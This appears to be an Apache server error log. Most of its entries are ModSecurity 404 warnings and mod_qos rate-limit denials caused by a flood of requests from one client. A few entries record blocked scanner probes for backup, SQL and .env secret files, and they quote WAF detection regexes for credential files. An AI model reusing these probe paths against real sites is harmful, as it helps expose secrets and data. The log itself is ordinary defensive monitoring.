[Tue May 26 19:54:39.321349 2026] [security2:error] [pid 86490:tid 86669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCNgAAALY"]
[Tue May 26 19:54:39.321491 2026] [security2:error] [pid 86490:tid 86711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCRwAAAOA"]
[Tue May 26 19:54:39.344578 2026] [security2:error] [pid 86490:tid 86678] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCVwAAAL8"]
[Tue May 26 19:54:39.349107 2026] [security2:error] [pid 93868:tid 94359] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJkqK9k_ZUB2Vp25KSAAAAfQ"]
[Tue May 26 19:54:39.353300 2026] [security2:error] [pid 93576:tid 93759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJWDRMqfxdEDkoszSBAAAAC8"]
[Tue May 26 19:54:39.374372 2026] [security2:error] [pid 93576:tid 93761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJWDRMqfxdEDkoszSBQAAADE"]
[Tue May 26 19:54:39.387977 2026] [security2:error] [pid 93576:tid 93765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJmDRMqfxdEDkoszSFQAAADU"]
[Tue May 26 19:54:39.388756 2026] [security2:error] [pid 86490:tid 86698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCSAAAANM"]
[Tue May 26 19:54:39.390927 2026] [security2:error] [pid 93868:tid 94269] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJkqK9k_ZUB2Vp25KSQAAAZo"]
[Tue May 26 19:54:39.391937 2026] [security2:error] [pid 86490:tid 86680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJlZMwN0DpLVWo6LCkQAAAME"]
[Tue May 26 19:54:39.402669 2026] [security2:error] [pid 86490:tid 86626] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJlZMwN0DpLVWo6LCmgAAAIs"]
[Tue May 26 19:54:39.406437 2026] [security2:error] [pid 86490:tid 86622] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJlZMwN0DpLVWo6LCkAAAAIc"]
[Tue May 26 19:54:39.409309 2026] [security2:error] [pid 86490:tid 86684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJlZMwN0DpLVWo6LCoQAAAMU"]
[Tue May 26 19:54:39.420231 2026] [security2:error] [pid 93868:tid 94314] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJkqK9k_ZUB2Vp25KSwAAAcc"]
[Tue May 26 19:54:39.433906 2026] [security2:error] [pid 86490:tid 86735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCVgAAAPg"]
[Tue May 26 19:54:39.441530 2026] [security2:error] [pid 93868:tid 94279] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJkqK9k_ZUB2Vp25KVwAAAaQ"]
[Tue May 26 19:54:39.444738 2026] [security2:error] [pid 86490:tid 86706] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJlZMwN0DpLVWo6LCkwAAANs"]
[Tue May 26 19:54:39.462042 2026] [security2:error] [pid 86490:tid 86686] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJlZMwN0DpLVWo6LCsQAAAMc"]
[Tue May 26 19:54:39.464415 2026] [security2:error] [pid 93868:tid 94272] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJkqK9k_ZUB2Vp25KXAAAAZ0"]
[Tue May 26 19:54:39.465486 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJmDRMqfxdEDkoszSEwAAAAA"]
[Tue May 26 19:54:39.468828 2026] [security2:error] [pid 93868:tid 94337] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJkqK9k_ZUB2Vp25KVQAAAd4"]
[Tue May 26 19:54:39.592799 2026] [qos:error] [pid 86490:tid 86733] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LDOwAAAPY
[Tue May 26 19:54:39.595321 2026] [qos:error] [pid 93576:tid 93767] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ2DRMqfxdEDkoszSRAAAADc
[Tue May 26 19:54:39.599593 2026] [qos:error] [pid 86490:tid 86672] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LDPQAAALk
[Tue May 26 19:54:39.671686 2026] [qos:error] [pid 93868:tid 94317] [client 45.148.10.120:49384] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ0qK9k_ZUB2Vp25KgwAAAco
[Tue May 26 19:54:39.765402 2026] [security2:error] [pid 86490:tid 86712] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/database.orig"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDPwAAAOE"]
[Tue May 26 19:54:39.827722 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ2DRMqfxdEDkoszSRgAAAAQ
[Tue May 26 19:54:39.834051 2026] [qos:error] [pid 93868:tid 94259] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ0qK9k_ZUB2Vp25KhQAAAZA
[Tue May 26 19:54:39.834220 2026] [qos:error] [pid 86490:tid 86686] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LDQwAAAMc
[Tue May 26 19:54:39.836134 2026] [qos:error] [pid 86490:tid 86648] [client 45.148.10.120:49344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LDRAAAAKE
[Tue May 26 19:54:39.855781 2026] [qos:error] [pid 86490:tid 86636] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LDRQAAAJU
[Tue May 26 19:54:40.102073 2026] [security2:error] [pid 86490:tid 86659] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/opt/project/.env"] [unique_id "ahWtKFZMwN0DpLVWo6LDTQAAAKw"]
[Tue May 26 19:54:40.270382 2026] [qos:error] [pid 93868:tid 94364] [client 45.148.10.120:49360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKEqK9k_ZUB2Vp25KhgAAAfk
[Tue May 26 19:54:40.271568 2026] [security2:error] [pid 86490:tid 86667] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backup/sample.sql"] [unique_id "ahWtKFZMwN0DpLVWo6LDTgAAALQ"]
[Tue May 26 19:54:40.278571 2026] [security2:error] [pid 86490:tid 86668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCQAAAALU"]
[Tue May 26 19:54:40.282301 2026] [security2:error] [pid 93868:tid 94271] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJkqK9k_ZUB2Vp25KYwAAAZw"]
[Tue May 26 19:54:40.283564 2026] [security2:error] [pid 93868:tid 94323] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJkqK9k_ZUB2Vp25KXgAAAdA"]
[Tue May 26 19:54:40.298620 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJmDRMqfxdEDkoszSIwAAAAE"]
[Tue May 26 19:54:40.303451 2026] [security2:error] [pid 86490:tid 86679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJlZMwN0DpLVWo6LCowAAAMA"]
[Tue May 26 19:54:40.303584 2026] [security2:error] [pid 93576:tid 93776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJmDRMqfxdEDkoszSJAAAAEA"]
[Tue May 26 19:54:40.304980 2026] [security2:error] [pid 93576:tid 93826] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJmDRMqfxdEDkoszSJQAAAHI"]
[Tue May 26 19:54:40.313920 2026] [security2:error] [pid 93576:tid 93722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJmDRMqfxdEDkoszSKAAAAAo"]
[Tue May 26 19:54:40.319690 2026] [security2:error] [pid 93868:tid 94369] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJkqK9k_ZUB2Vp25KaAAAAf4"]
[Tue May 26 19:54:40.320694 2026] [security2:error] [pid 93576:tid 93731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJmDRMqfxdEDkoszSJgAAABM"]
[Tue May 26 19:54:40.327705 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJmDRMqfxdEDkoszSIgAAAAk"]
[Tue May 26 19:54:40.334577 2026] [security2:error] [pid 86490:tid 86632] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LC9AAAAJE"]
[Tue May 26 19:54:40.342326 2026] [security2:error] [pid 93576:tid 93755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJmDRMqfxdEDkoszSKQAAACs"]
[Tue May 26 19:54:40.343947 2026] [security2:error] [pid 93868:tid 94303] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJkqK9k_ZUB2Vp25KaQAAAbw"]
[Tue May 26 19:54:40.347650 2026] [security2:error] [pid 93576:tid 93785] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJmDRMqfxdEDkoszSIQAAAEk"]
[Tue May 26 19:54:40.348251 2026] [security2:error] [pid 93868:tid 94324] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJkqK9k_ZUB2Vp25KWgAAAdE"]
[Tue May 26 19:54:40.350300 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ2DRMqfxdEDkoszSNwAAAHs"]
[Tue May 26 19:54:40.357258 2026] [security2:error] [pid 93576:tid 93799] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ2DRMqfxdEDkoszSMAAAAFc"]
[Tue May 26 19:54:40.359335 2026] [security2:error] [pid 93868:tid 94322] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ0qK9k_ZUB2Vp25KcQAAAc8"]
[Tue May 26 19:54:40.363223 2026] [security2:error] [pid 93576:tid 93793] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ2DRMqfxdEDkoszSMQAAAFE"]
[Tue May 26 19:54:40.405004 2026] [security2:error] [pid 93576:tid 93823] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ2DRMqfxdEDkoszSNQAAAG8"]
[Tue May 26 19:54:40.405923 2026] [security2:error] [pid 86490:tid 86725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDFAAAAO4"]
[Tue May 26 19:54:40.406456 2026] [security2:error] [pid 86490:tid 86653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LC-QAAAKY"]
[Tue May 26 19:54:40.418743 2026] [security2:error] [pid 86490:tid 86633] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDBwAAAJI"]
[Tue May 26 19:54:40.421845 2026] [security2:error] [pid 86490:tid 86656] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDFwAAAKk"]
[Tue May 26 19:54:40.430030 2026] [security2:error] [pid 86490:tid 86670] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDDwAAALc"]
[Tue May 26 19:54:40.432870 2026] [security2:error] [pid 93868:tid 94315] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ0qK9k_ZUB2Vp25KdwAAAcg"]
[Tue May 26 19:54:40.441767 2026] [security2:error] [pid 86490:tid 86639] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDCwAAAJg"]
[Tue May 26 19:54:40.448798 2026] [security2:error] [pid 93868:tid 94292] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ0qK9k_ZUB2Vp25KcwAAAbE"]
[Tue May 26 19:54:40.450256 2026] [security2:error] [pid 86490:tid 86724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ1ZMwN0DpLVWo6LDGQAAAO0"]
[Tue May 26 19:54:40.450840 2026] [security2:error] [pid 93576:tid 93829] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJ2DRMqfxdEDkoszSQQAAAHU"]
[Tue May 26 19:54:40.638301 2026] [qos:error] [pid 93576:tid 93768] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtKGDRMqfxdEDkoszSaQAAADg
[Tue May 26 19:54:40.638512 2026] [qos:error] [pid 86490:tid 86703] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtKFZMwN0DpLVWo6LDgQAAANg
[Tue May 26 19:54:40.638981 2026] [qos:error] [pid 93576:tid 93769] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtKGDRMqfxdEDkoszSagAAADk
[Tue May 26 19:54:40.704273 2026] [qos:error] [pid 86490:tid 86639] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKFZMwN0DpLVWo6LDhgAAAJg
[Tue May 26 19:54:40.709331 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKFZMwN0DpLVWo6LDhwAAAM4
[Tue May 26 19:54:40.713334 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:35072] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKFZMwN0DpLVWo6LDiAAAALM
[Tue May 26 19:54:40.757548 2026] [qos:error] [pid 93576:tid 93759] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKGDRMqfxdEDkoszSbAAAAC8
[Tue May 26 19:54:40.779312 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:49396] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKGDRMqfxdEDkoszSbQAAADI
[Tue May 26 19:54:40.791467 2026] [qos:error] [pid 86490:tid 86737] [client 45.148.10.120:56922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKFZMwN0DpLVWo6LDigAAAPo
[Tue May 26 19:54:40.792310 2026] [qos:error] [pid 86490:tid 86655] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKFZMwN0DpLVWo6LDiwAAAKg
[Tue May 26 19:54:40.793575 2026] [qos:error] [pid 93576:tid 93822] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKGDRMqfxdEDkoszSbgAAAG4
[Tue May 26 19:54:40.822494 2026] [qos:error] [pid 86490:tid 86738] [client 45.148.10.120:49400] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKFZMwN0DpLVWo6LDjAAAAPs
[Tue May 26 19:54:40.854499 2026] [qos:error] [pid 86490:tid 86706] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKFZMwN0DpLVWo6LDjQAAANs
[Tue May 26 19:54:40.860937 2026] [qos:error] [pid 86490:tid 86679] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKFZMwN0DpLVWo6LDjgAAAMA
